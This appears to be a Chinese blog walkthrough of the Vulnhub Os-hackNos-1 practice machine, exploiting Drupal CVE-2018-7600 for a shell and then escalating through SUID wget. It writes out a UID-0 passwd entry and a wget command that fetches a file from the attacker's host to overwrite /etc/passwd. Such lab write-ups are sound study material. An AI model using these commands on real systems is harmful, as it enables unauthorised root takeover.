oscp——Os-hackNos-1

0x00 前言

这个是第二十台机子了,感觉有点感觉了,但是还是差一点东西。
54ix5aW96ICB5amG

链接

https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

0x01 信息收集

ip

在这里插入图片描述

端口

在这里插入图片描述

0x02 攻击

1.端口

端口无果

2.web

访问80端口
在这里插入图片描述
然后进行目录遍历,可以看到一个是一个drupal的cms
在这里插入图片描述
先判断下版本
在这里插入图片描述
找一下历史漏洞,发现有一个cve
CVE-2018-7600
https://github.com/pimps/CVE-2018-7600
然后进行利用
在这里插入图片描述
弹一个shell回来
在这里插入图片描述
然后看一下suid的内容在这里插入图片描述
有wget,可以使用wget提权
把目标的passwd的内容copy下来
然后加上
test: 1 1 1test$at615QShYKduQlx5z9Zm7/:0:0:root:/root:/bin/bash
本地开启http
执行
wget http://192.168.0.111:8000/passwd -O /etc/passwd
之后su提权
su test
123456
在这里插入图片描述
拿到flag
在这里插入图片描述

0x03 总结

  • suid wget提权学习
已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页